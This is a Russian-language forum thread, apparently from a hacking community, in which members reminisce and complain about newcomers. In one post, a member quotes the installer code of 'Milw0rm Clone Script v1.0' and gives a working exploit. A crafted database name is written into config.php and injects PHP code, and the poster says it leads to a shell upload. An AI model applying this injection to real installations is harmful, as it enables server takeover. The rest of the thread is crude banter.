Дело было вечером, делать было нечего, а именно в данный момент. Сижу занимаюсь херней, качаю треки, дрочу на суи (без обид) Так вот думаю... а не зря открыли регу?! Смотрю на ачат, и прям аж за душу хватает, столько толковых слов\цитат\предложений. Многие помогают друг другу, отвечают на вопросы, задают, как в старые добрые времена... А наши старики, сидят и тупо смотрят, на то что происходит. Вопрос старикам: Ребят, стареем мы да?! Я раньше пытался, а щас уже не стоит... а у вас как? По поводу обучения\повышения авторитета\etc Вопрос новичкам: Что вы получили на этом форуме?! И получили ли что-либо? p.s.: еще сижу и думаю, а где "имхо, etc" итд? p.s.2: strilo4ka - девушка p.s.3: где моя блудмуун, санджуро блекет, голд гоблин, де-визибл, кракен, логин999
Когда я только пришёл на ачат, большая часть завсегдатых были подростками, тогда приоритеты были другие, амбиции какие-то, желание кому-то что-то доказать. Сейчас все выросли, альтруизму предпочитают заработать денег, а популярности спокойную жизнь без мозгоёбства. В крови всё меньше и меньше рокнрола... P.S. Санж жив здоров, котов мучает).
его с альтблицем познакомить нужно... коннор помню и тебя, хорошо что ты тут, реально так замучало смотреть на то как все теряется хочется прошлого, хоть и не был активен в прошлом, но читал и дрочил на посты заядлых флудеров, ибо это было интересно, а щас смотришь, и ппц, или ты их не понимаешь или они идут не в ту сторону
С обучением всё замечательно, есть стремление, есть запал, даже более сильный, чем раньше. Повышения авторитета - всегда похуй было, с самого начала паразитировал на античате. Не публиковал ничего стоящего, только черпал знания, когда-то. В плане простого общения античат сейчас мало-интересен, личностей очень не хватает. Really?
По поводу открытой реги меня бомбит нереально. Лето, школьники все щимятся на форум, пишут свой бред, никто даже не старается думать, некоторые из них настолько тупорылые что даже в предложении из 4 слов делают логические связки просто не читаемые. И сидишь ахуевший и представляешь этого дибила с ягуаром вместо головы. Тоже случай был сегодня, чел умного включал что он так прям много гуглил, так много читал и рассуждал какой сплоент выбрать, но все они не подходят по описанию и комментариям, я дал линк и чел тупо его заюзал не прочитав не одного комментария а потом еще удивился "где же рут". Только вот сплоент рута и не дает. Толку в ИТ нет красивых девушек. Ей только мой пост не показывайте
Я и не пропадал работы много было - командировки по РФ, наверно за 3 года можно было раз 12 экватор проехать. Сижу, играю в варспу, параллельно от делать нехрен доковырял Milw0rm Clone Script v1.0 до заливки шелла [1], и по ящику смотрю National Geographic Channel. Spoiler: [1] /install/step1.php Code: <? if(isset($_POST['ok'])){ if(empty($_POST['SERVER_NAME']) or empty($_POST['SERVER_USER']) or empty($_POST['SERVER_PASS']) or empty($_POST['SERVER_DB'])){ echo "<script language='javascript'>alert('Please ensure that you complete all the fields fully.');</script>"; }else{ $connect = @mysql_connect($_POST['SERVER_NAME'],$_POST['SERVER_USER'],$_POST['SERVER_PASS']); if($connect){ $db = @mysql_select_db($_POST['SERVER_DB']); if($db){ echo '<meta http-equiv="refresh" content="0; url=step2.php">'; $message = '<? define("SERVER_NAME", "'.$_POST['SERVER_NAME'].'"); define("SERVER_USER", "'.$_POST['SERVER_USER'].'"); define("SERVER_PASS", "'.$_POST['SERVER_PASS'].'"); define("SERVER_DB", "'.$_POST['SERVER_DB'].'"); @mysql_connect(SERVER_NAME,SERVER_USER,SERVER_PASS) or die(mysql_error()); @mysql_select_db(SERVER_DB) or die(mysql_error()); ?>'; $file = @fopen("../include/config.php","w"); @fwrite($file,$message); @fclose($file); }else{ echo "<script language='javascript'>alert('Please select the right database.');</script>"; } }else{ echo "<script language='javascript'>alert('We cant connect to this serveur.');</script>"; } } } ?> exp: Создаём базу ");phpinfo();/* конектимся Server: remoteip User: user Password: pass Database: ");phpinfo();/* далее Code: $db = @mysql_select_db($_POST['SERVER_DB']); if($db){ в итоге пишемся в файл: /include/config.php Code: <? define("SERVER_NAME", "127.0.0.1"); define("SERVER_USER", "root"); define("SERVER_PASS", ""); define("SERVER_DB", "");phpinfo()/*"); @mysql_connect(SERVER_NAME,SERVER_USER,SERVER_PASS) or die(mysql_error()); @mysql_select_db(SERVER_DB) or die(mysql_error()); ?>
После работы , флудить лень. Бесит иногда laravel после Yii. . Главное что б новички создавили квесты писали статьи снимали видео и делали релизы. Тогда ачат оживет по полной Жду 7 пыху